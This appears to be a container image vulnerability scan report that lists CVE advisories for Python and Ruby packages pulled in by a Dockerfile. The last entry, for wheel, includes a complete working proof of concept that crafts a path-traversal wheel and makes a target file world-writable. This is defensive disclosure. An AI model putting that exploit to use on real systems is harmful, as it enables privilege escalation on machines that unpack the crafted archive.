urllib3 2.0.7 (pypi) pkg:pypi/urllib3@2.0.7 # Dockerfile (54:56) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-dev-tools Improper Handling of Highly Compressed Data (Data Amplification) Affected range >=1.22 <2.6.3 Fixed version 2.6.3 CVSS Score 8.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H EPSS Score 0.031% EPSS Percentile 9th percentile Description Impact urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP Content-Encoding header (e.g., gzip, deflate, br, or zstd). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. However, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client (high CPU usage and large memory allocations for decompressed data; CWE-409). Affected usages Applications and libraries using urllib3 version 2.6.2 and earlier to stream content from untrusted sources by setting preload_content=False when they do not disable redirects. Remediation Upgrade to at least urllib3 v2.6.3 in which the library does not decode content of redirect responses when preload_content=False. If upgrading is not immediately possible, disable redirects by setting redirect=False for requests to untrusted source. Improper Handling of Highly Compressed Data (Data Amplification) Affected range >=1.0 <2.6.0 Fixed version 2.6.0 CVSS Score 8.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H EPSS Score 0.027% EPSS Percentile 7th percentile Description Impact urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. When streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP Content-Encoding header (e.g., gzip, deflate, br, or zstd). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation. The decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side, even if the application only requested a small chunk of data. Affected usages Applications and libraries using urllib3 version 2.5.0 and earlier to stream large compressed responses or content from untrusted sources. stream(), read(amt=256), read1(amt=256), read_chunked(amt=256), readinto(b) are examples of urllib3.HTTPResponse method calls using the affected logic unless decoding is disabled explicitly. Remediation Upgrade to at least urllib3 v2.6.0 in which the library avoids decompressing data that exceeds the requested amount. If your environment contains a package facilitating the Brotli encoding, upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These versions are enforced by the urllib3[brotli] extra in the patched versions of urllib3. Credits The issue was reported by @Cycloctane. Supplemental information was provided by @stamparm during a security audit performed by 7ASecurity and facilitated by OSTIF. Allocation of Resources Without Limits or Throttling Affected range >=1.24 <2.6.0 Fixed version 2.6.0 CVSS Score 8.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H EPSS Score 0.029% EPSS Percentile 8th percentile Description Impact urllib3 supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., Content-Encoding: gzip, zstd). However, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data. Affected usages Applications and libraries using urllib3 version 2.5.0 and earlier for HTTP requests to untrusted sources unless they disable content decoding explicitly. Remediation Upgrade to at least urllib3 v2.6.0 in which the library limits the number of links to 5. If upgrading is not immediately possible, use preload_content=False and ensure that resp.headers["content-encoding"] contains a safe number of encodings before reading the response content. URL Redirection to Untrusted Site ('Open Redirect') Affected range <2.5.0 Fixed version 2.5.0 CVSS Score 5.3 CVSS Vector CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N EPSS Score 0.018% EPSS Percentile 4th percentile Description urllib3 handles redirects and retries using the same mechanism, which is controlled by the Retry object. The most common way to disable redirects is at the request level, as follows: resp = urllib3.request("GET", "https://httpbin.org/redirect/1", redirect=False) print(resp.status) # 302 However, it is also possible to disable redirects, for all requests, by instantiating a PoolManager and specifying retries in a way that disable redirects: import urllib3 http = urllib3.PoolManager(retries=0) # should raise MaxRetryError on redirect http = urllib3.PoolManager(retries=urllib3.Retry(redirect=0)) # equivalent to the above http = urllib3.PoolManager(retries=False) # should return the first response resp = http.request("GET", "https://httpbin.org/redirect/1") However, the retries parameter is currently ignored, which means all the above examples don't disable redirects. Affected usages Passing retries on PoolManager instantiation to disable redirects or restrict their number. By default, requests and botocore users are not affected. Impact Redirects are often used to exploit SSRF vulnerabilities. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable. Remediation You can remediate this vulnerability with the following steps: Upgrade to a patched version of urllib3. If your organization would benefit from the continued support of urllib3 1.x, please contact sethmichaellarson@gmail.com to discuss sponsorship or contribution opportunities. Disable redirects at the request() level instead of the PoolManager() level. Incorrect Resource Transfer Between Spheres Affected range >=2.0.0 <2.2.2 Fixed version 2.2.2 CVSS Score 4.4 CVSS Vector CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N EPSS Score 0.263% EPSS Percentile 49th percentile Description When using urllib3's proxy support with ProxyManager, the Proxy-Authorization header is only sent to the configured proxy, as expected. However, when sending HTTP requests without using urllib3's proxy support, it's possible to accidentally configure the Proxy-Authorization header even though it won't have any effect as the request is not using a forwarding proxy or a tunneling proxy. In those cases, urllib3 doesn't treat the Proxy-Authorization HTTP header as one carrying authentication material and thus doesn't strip the header on cross-origin redirects. Because this is a highly unlikely scenario, we believe the severity of this vulnerability is low for almost all users. Out of an abundance of caution urllib3 will automatically strip the Proxy-Authorization header during cross-origin redirects to avoid the small chance that users are doing this on accident. Users should use urllib3's proxy support or disable automatic redirects to achieve safe processing of the Proxy-Authorization header, but we still decided to strip the header by default in order to further protect users who aren't using the correct approach. Affected usages We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited: Setting the Proxy-Authorization header without using urllib3's built-in proxy support. Not disabling HTTP redirects. Either not using an HTTPS origin server or for the proxy or target origin to redirect to a malicious origin. Remediation Using the Proxy-Authorization header with urllib3's ProxyManager. Disabling HTTP redirects using redirects=False when sending requests. Not using the Proxy-Authorization header.

cryptography 41.0.7 (pypi) pkg:pypi/cryptography@41.0.7 # Dockerfile (44:46) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y curl Observable Discrepancy Affected range <42.0.0 Fixed version 42.0.0 CVSS Score 8.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N EPSS Score 1.147% EPSS Percentile 78th percentile Description A flaw was found in the python-cryptography package. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data. Insufficient Verification of Data Authenticity Affected range <=46.0.4 Fixed version 46.0.5 CVSS Score 8.2 CVSS Vector CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X EPSS Score 0.007% EPSS Percentile 0th percentile Description Vulnerability Summary The public_key_from_numbers (or EllipticCurvePublicNumbers.public_key()), EllipticCurvePublicNumbers.public_key(), load_der_public_key() and load_pem_public_key() functions do not verify that the point belongs to the expected prime-order subgroup of the curve. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this. Credit This vulnerability was discovered by: XlabAI Team of Tencent Xuanwu Lab Atuin Automated Vulnerability Discovery Engine NULL Pointer Dereference Affected range >=38.0.0 <42.0.4 Fixed version 42.0.4 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 0.341% EPSS Percentile 56th percentile Description If pkcs12.serialize_key_and_certificates is called with both: A certificate whose public key did not match the provided private key An encryption_algorithm with hmac_hash set (via PrivateFormat.PKCS12.encryption_builder().hmac_hash(...) Then a NULL pointer dereference would occur, crashing the Python process. This has been resolved, and now a ValueError is properly raised. Patched in pyca/cryptography#10423 NULL Pointer Dereference Affected range <42.0.2 Fixed version 42.0.2 CVSS Score 5.5 CVSS Vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H EPSS Score 0.236% EPSS Percentile 46th percentile Description Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL to crash leading to a potential Denial of Service attack Impact summary: Applications loading files in the PKCS12 format from untrusted sources might terminate abruptly. A file in PKCS12 format can contain certificates and keys and may come from an untrusted source. The PKCS12 specification allows certain fields to be NULL, but OpenSSL does not correctly check for this case. This can lead to a NULL pointer dereference that results in OpenSSL crashing. If an application processes PKCS12 files from an untrusted source using the OpenSSL APIs then that application will be vulnerable to this issue. OpenSSL APIs that are vulnerable to this are: PKCS12_parse(), PKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes() and PKCS12_newpass(). We have also fixed a similar issue in SMIME_write_PKCS7(). However since this function is related to writing data we do not consider it security significant. The FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue. Dependency on Vulnerable Third-Party Component Affected range >=37.0.0 <43.0.1 Fixed version 43.0.1 Description pyca/cryptography's wheels include a statically linked copy of OpenSSL. The versions of OpenSSL included in cryptography 37.0.0-43.0.0 are vulnerable to a security issue. More details about the vulnerability itself can be found in https://openssl-library.org/news/secadv/20240903.txt. If you are building cryptography source ("sdist") then you are responsible for upgrading your copy of OpenSSL. Only users installing from wheels built by the cryptography project (i.e., those distributed on PyPI) need to update their cryptography versions.

protobuf 4.21.12 (pypi) pkg:pypi/protobuf@4.21.12 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Uncontrolled Recursion Affected range <5.29.6 Fixed version 6.33.5 CVSS Score 8.2 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L EPSS Score 0.025% EPSS Percentile 7th percentile Description A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages. Due to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python’s recursion stack and causing a RecursionError. Uncontrolled Recursion Affected range <4.25.8 Fixed version 4.25.8 CVSS Score 8.2 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N EPSS Score 0.006% EPSS Percentile 0th percentile Description Summary Any project that uses Protobuf pure-Python backend to parse untrusted Protocol Buffers data containing an arbitrary number of recursive groups, recursive messages or a series of SGROUP tags can be corrupted by exceeding the Python recursion limit. Reporter: Alexis Challande, Trail of Bits Ecosystem Security Team ecosystem@trailofbits.com Affected versions: This issue only affects the pure-Python implementation of protobuf-python backend. This is the implementation when PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION=python environment variable is set or the default when protobuf is used from Bazel or pure-Python PyPi wheels. CPython PyPi wheels do not use pure-Python by default. This is a Python variant of a previous issue affecting protobuf-java. Severity This is a potential Denial of Service. Parsing nested protobuf data creates unbounded recursions that can be abused by an attacker. Proof of Concept For reproduction details, please refer to the unit tests decoder_test.py and message_test Remediation and Mitigation A mitigation is available now. Please update to the latest available versions of the following packages: protobuf-python(4.25.8, 5.29.5, 6.31.1)

setuptools 68.1.2 (pypi) pkg:pypi/setuptools@68.1.2 # Dockerfile (54:56) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-dev-tools Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Affected range <78.1.1 Fixed version 78.1.1 CVSS Score 7.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P EPSS Score 0.180% EPSS Percentile 40th percentile Description Summary A path traversal vulnerability in PackageIndex was fixed in setuptools version 78.1.1 Details def _download_url(self, url, tmpdir): # Determine download filename # name, _fragment = egg_info_for_url(url) if name: while '..' in name: name = name.replace('..', '.').replace('\\', '_') else: name = "__downloaded__" # default if URL has no path contents if name.endswith('.[egg.zip](http://egg.zip/)'): name = name[:-4] # strip the extra .zip before download --> filename = os.path.join(tmpdir, name) Here: https://github.com/pypa/setuptools/blob/6ead555c5fb29bc57fe6105b1bffc163f56fd558/setuptools/package_index.py#L810C1-L825C88 os.path.join() discards the first argument tmpdir if the second begins with a slash or drive letter. name is derived from a URL without sufficient sanitization. While there is some attempt to sanitize by replacing instances of '..' with '.', it is insufficient. Risk Assessment As easy_install and package_index are deprecated, the exploitation surface is reduced. However, it seems this could be exploited in a similar fashion like GHSA-r9hx-vwmv-q579, and as described by POC 4 in GHSA-cx63-2mw6-8hw5 report: via malicious URLs present on the pages of a package index. Impact An attacker would be allowed to write files to arbitrary locations on the filesystem with the permissions of the process running the Python code, which could escalate to RCE depending on the context. References https://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5 pypa/setuptools#4946 Improper Control of Generation of Code ('Code Injection') Affected range <70.0.0 Fixed version 70.0.0 CVSS Score 7.5 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N EPSS Score 4.940% EPSS Percentile 89th percentile Description A vulnerability in the package_index module of pypa/setuptools versions up to 69.1.1 allows for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. The issue is fixed in version 70.0.

rexml 3.2.5 (gem) pkg:gem/rexml@3.2.5 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion') Affected range <3.3.6 Fixed version 3.3.6 CVSS Score 8.2 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N EPSS Score 1.135% EPSS Percentile 78th percentile Description Impact The REXML gem before 3.3.6 has a DoS vulnerability when it parses an XML that has many deep elements that have same local name attributes. If you need to parse untrusted XMLs with tree parser API like REXML::Document.new, you may be impacted to this vulnerability. If you use other parser APIs such as stream parser API and SAX2 parser API, this vulnerability is not affected. Patches The REXML gem 3.3.6 or later include the patch to fix the vulnerability. Workarounds Don't parse untrusted XMLs with tree parser API. References https://www.ruby-lang.org/en/news/2024/08/22/dos-rexml-cve-2024-43398/ : An announce on www.ruby-lang.org Uncontrolled Resource Consumption Affected range <3.3.3 Fixed version 3.3.3 CVSS Score 6.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N EPSS Score 0.661% EPSS Percentile 71st percentile Description Impact The REXML gem before 3.3.2 has a DoS vulnerability when it parses an XML that has many entity expansions with SAX2 or pull parser API. If you need to parse untrusted XMLs with SAX2 or pull parser API, you may be impacted to this vulnerability. Patches The REXML gem 3.3.3 or later include the patch to fix the vulnerability. Workarounds Don't parse untrusted XMLs with SAX2 or pull parser API. References https://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/ : This is a similar vulnerability https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41946/: An announce on www.ruby-lang.org Uncontrolled Resource Consumption Affected range <3.3.3 Fixed version 3.3.3 CVSS Score 6.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N EPSS Score 0.232% EPSS Percentile 46th percentile Description Impact The REXML gem before 3.3.2 has some DoS vulnerabilities when it parses an XML that has many specific characters such as whitespace character, >] and ]>. If you need to parse untrusted XMLs, you may be impacted to these vulnerabilities. Patches The REXML gem 3.3.3 or later include the patches to fix these vulnerabilities. Workarounds Don't parse untrusted XMLs. References GHSA-vg3r-rm7w-2xgh : This is a similar vulnerability GHSA-4xqq-m2hx-25v8 : This is a similar vulnerability https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41123/: An announce on www.ruby-lang.org Uncontrolled Resource Consumption Affected range <3.3.2 Fixed version 3.3.2 CVSS Score 6.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N EPSS Score 7.262% EPSS Percentile 91st percentile Description Impact The REXML gem before 3.3.1 has some DoS vulnerabilities when it parses an XML that has many specific characters such as <, 0 and %>. If you need to parse untrusted XMLs, you may be impacted to these vulnerabilities. Patches The REXML gem 3.3.2 or later include the patches to fix these vulnerabilities. Workarounds Don't parse untrusted XMLs. References GHSA-vg3r-rm7w-2xgh : This is a similar vulnerability https://www.ruby-lang.org/en/news/2024/07/16/dos-rexml-cve-2024-39908/ Inefficient Regular Expression Complexity Affected range <3.3.9 Fixed version 3.3.9 CVSS Score 6.6 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U EPSS Score 1.217% EPSS Percentile 79th percentile Description Impact The REXML gem before 3.3.9 has a ReDoS vulnerability when it parses an XML that has many digits between &# and x...; in a hex numeric character reference (&#x...;). This does not happen with Ruby 3.2 or later. Ruby 3.1 is the only affected maintained Ruby. Note that Ruby 3.1 will reach EOL on 2025-03. Patches The REXML gem 3.3.9 or later include the patch to fix the vulnerability. Workarounds Use Ruby 3.2 or later instead of Ruby 3.1. References https://www.ruby-lang.org/en/news/2024/10/28/redos-rexml-cve-2024-49761/: An announce on www.ruby-lang.org Uncontrolled Resource Consumption Affected range <3.2.7 Fixed version 3.2.7 CVSS Score 5.3 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L EPSS Score 6.902% EPSS Percentile 91st percentile Description Impact The REXML gem before 3.2.6 has a DoS vulnerability when it parses an XML that has many >s in an attribute value. If you need to parse untrusted XMLs, you may be impacted to this vulnerability. Patches The REXML gem 3.2.7 or later include the patch to fix this vulnerability. Workarounds Don't parse untrusted XMLs. References https://www.ruby-lang.org/en/news/2024/05/16/dos-rexml-cve-2024-35176/

webrick 1.8.1 (gem) pkg:gem/webrick@1.8.1 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') Affected range <=1.8.1 Fixed version 1.8.2 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N EPSS Score 0.108% EPSS Percentile 29th percentile Description An issue was discovered in the WEBrick toolkit through 1.8.1 for Ruby. It allows HTTP request smuggling by providing both a Content-Length header and a Transfer-Encoding header, e.g., "GET /admin HTTP/1.1\r\n" inside of a "POST /user HTTP/1.1\r\n" request. NOTE: the supplier's position is "Webrick should not be used in production." Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') Affected range <1.8.2 Fixed version 1.8.2 CVSS Score 6.5 CVSS Vector CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N EPSS Score 0.057% EPSS Percentile 18th percentile Description Ruby WEBrick read_header HTTP Request Smuggling Vulnerability. This vulnerability allows remote attackers to smuggle arbitrary HTTP requests on affected installations of Ruby WEBrick. This issue is exploitable when the product is deployed behind an HTTP proxy that fulfills specific conditions. The specific flaw exists within the read_headers method. The issue results from the inconsistent parsing of terminators of HTTP headers. An attacker can leverage this vulnerability to smuggle arbitrary HTTP requests. Was ZDI-CAN-21876.

mpmath 0.0.0 (pypi) pkg:pypi/mpmath@0.0.0 # Dockerfile (64:66) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-jazzy-desktop Allocation of Resources Without Limits or Throttling Affected range <1.3.0 Fixed version 1.3.0 CVSS Score 8.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N EPSS Score 0.949% EPSS Percentile 76th percentile Description A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in Mpmath v1.0.0 when the mpmathify function is called.

brotli 1.1.0 (pypi) pkg:pypi/brotli@1.1.0 # Dockerfile (64:66) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-jazzy-desktop Uncontrolled Resource Consumption Affected range <=1.1.0 Fixed version 1.2.0 CVSS Score 7.5 CVSS Vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 0.024% EPSS Percentile 6th percentile Description Scrapy versions up to 2.13.3 are vulnerable to a denial of service (DoS) attack due to a flaw in its brotli decompression implementation. The protection mechanism against decompression bombs fails to mitigate the brotli variant, allowing remote servers to crash clients with less than 80GB of available memory. This occurs because brotli can achieve extremely high compression ratios for zero-filled data, leading to excessive memory consumption during decompression. Mitigation for this vulnerability needs security enhancement added in brotli v1.2.0.

wheel 0.42.0 (pypi) pkg:pypi/wheel@0.42.0 # Dockerfile (128:130) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ sudo apt-get update && sudo apt --no-install-recommends install -y python3-pip Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Affected range >=0.40.0 <=0.46.1 Fixed version 0.46.2 CVSS Score 7.1 CVSS Vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H EPSS Score 0.008% EPSS Percentile 1st percentile Description Summary Vulnerability Type: Path Traversal (CWE-22) leading to Arbitrary File Permission Modification. Root Cause Component: wheel.cli.unpack.unpack function. Affected Packages: wheel (Upstream source) setuptools (Downstream, vendors wheel) Severity: High (Allows modifying system file permissions). Details The vulnerability exists in how the unpack function handles file permissions after extraction. The code blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. # Vulnerable Code Snippet (present in both wheel and setuptools/_vendor/wheel) for zinfo in wf.filelist: wf.extract(zinfo, destination) # (1) Extraction is handled safely by zipfile # (2) VULNERABILITY: # The 'permissions' are applied to a path constructed using the UNSANITIZED 'zinfo.filename'. # If zinfo.filename contains "../", this targets files outside the destination. permissions = zinfo.external_attr >> 16 & 0o777 destination.joinpath(zinfo.filename).chmod(permissions) PoC I have confirmed this exploit works against the unpack function imported from setuptools._vendor.wheel.cli.unpack. Prerequisites: pip install setuptools Step 1: Generate the Malicious Wheel (gen_poc.py) This script creates a wheel that passes internal hash validation but contains a directory traversal payload in the file list. import zipfile import hashlib import base64 import os def urlsafe_b64encode(data): """ Helper function to encode data using URL-safe Base64 without padding. Required by the Wheel file format specification. """ return base64.urlsafe_b64encode(data).rstrip(b'=').decode('ascii') def get_hash_and_size(data_bytes): """ Calculates SHA-256 hash and size of the data. These values are required to construct a valid 'RECORD' file, which is used by the 'wheel' library to verify integrity. """ digest = hashlib.sha256(data_bytes).digest() hash_str = "sha256=" + urlsafe_b64encode(digest) return hash_str, str(len(data_bytes)) def create_evil_wheel_v4(filename="evil-1.0-py3-none-any.whl"): print(f"[Generator V4] Creating 'Authenticated' Malicious Wheel: {filename}") # 1. Prepare Standard Metadata Content # These are minimal required contents to make the wheel look legitimate. wheel_content = b"Wheel-Version: 1.0\nGenerator: bdist_wheel (0.37.1)\nRoot-Is-Purelib: true\nTag: py3-none-any\n" metadata_content = b"Metadata-Version: 2.1\nName: evil\nVersion: 1.0\nSummary: PoC Package\n" # 2. Define Malicious Payload (Path Traversal) # The content doesn't matter, but the path does. payload_content = b"PWNED by Path Traversal" # [ATTACK VECTOR]: Target a file OUTSIDE the extraction directory using '../' # The vulnerability allows 'chmod' to affect this path directly. malicious_path = "../../poc_target.txt" # 3. Calculate Hashes for Integrity Check Bypass # The 'wheel' library verifies if the file hash matches the RECORD entry. # To bypass this check, we calculate the correct hash for our malicious file. wheel_hash, wheel_size = get_hash_and_size(wheel_content) metadata_hash, metadata_size = get_hash_and_size(metadata_content) payload_hash, payload_size = get_hash_and_size(payload_content) # 4. Construct the 'RECORD' File # The RECORD file lists all files in the wheel with their hashes. # CRITICAL: We explicitly register the malicious path ('../../poc_target.txt') here. # This tricks the 'wheel' library into treating the malicious file as a valid, verified component. record_lines = [ f"evil-1.0.dist-info/WHEEL,{wheel_hash},{wheel_size}", f"evil-1.0.dist-info/METADATA,{metadata_hash},{metadata_size}", f"{malicious_path},{payload_hash},{payload_size}", # <-- Authenticating the malicious path "evil-1.0.dist-info/RECORD,," ] record_content = "\n".join(record_lines).encode('utf-8') # 5. Build the Zip File with zipfile.ZipFile(filename, "w") as zf: # Write standard metadata files zf.writestr("evil-1.0.dist-info/WHEEL", wheel_content) zf.writestr("evil-1.0.dist-info/METADATA", metadata_content) zf.writestr("evil-1.0.dist-info/RECORD", record_content) # [EXPLOIT CORE]: Manually craft ZipInfo for the malicious file # We need to set specific permission bits to trigger the vulnerability. zinfo = zipfile.ZipInfo(malicious_path) # Set external attributes to 0o777 (rwxrwxrwx) # Upper 16 bits: File type (0o100000 = Regular File) # Lower 16 bits: Permissions (0o777 = World Writable) # The vulnerable 'unpack' function will blindly apply this '777' to the system file. zinfo.external_attr = (0o100000 | 0o777) << 16 zf.writestr(zinfo, payload_content) print("[Generator V4] Done. Malicious file added to RECORD and validation checks should pass.") if __name__ == "__main__": create_evil_wheel_v4() Step 2: Run the Exploit (exploit.py) from pathlib import Path import sys # Demonstrating impact on setuptools try: from setuptools._vendor.wheel.cli.unpack import unpack print("[*] Loaded unpack from setuptools") except ImportError: from wheel.cli.unpack import unpack print("[*] Loaded unpack from wheel") # 1. Setup Target (Read-Only system file simulation) target = Path("poc_target.txt") target.write_text("SENSITIVE CONFIG") target.chmod(0o400) # Read-only print(f"[*] Initial Perms: {oct(target.stat().st_mode)[-3:]}") # 2. Run Vulnerable Unpack # The wheel contains "../../poc_target.txt". # unpack() will extract safely, BUT chmod() will hit the actual target file. try: unpack("evil-1.0-py3-none-any.whl", "unpack_dest") except Exception as e: print(f"[!] Ignored expected extraction error: {e}") # 3. Check Result final_perms = oct(target.stat().st_mode)[-3:] print(f"[*] Final Perms: {final_perms}") if final_perms == "777": print("VULNERABILITY CONFIRMED: Target file is now world-writable (777)!") else: print("[-] Attack failed.") result: Impact Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files) to 777. This allows for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. Recommended Fix The unpack function must not use zinfo.filename for post-extraction operations. It should use the sanitized path returned by wf.extract(). Suggested Patch: # extract() returns the actual path where the file was written extracted_path = wf.extract(zinfo, destination) # Only apply chmod if a file was actually written if extracted_path: permissions = zinfo.external_attr >> 16 & 0o777 Path(extracted_path).chmod(permissions)

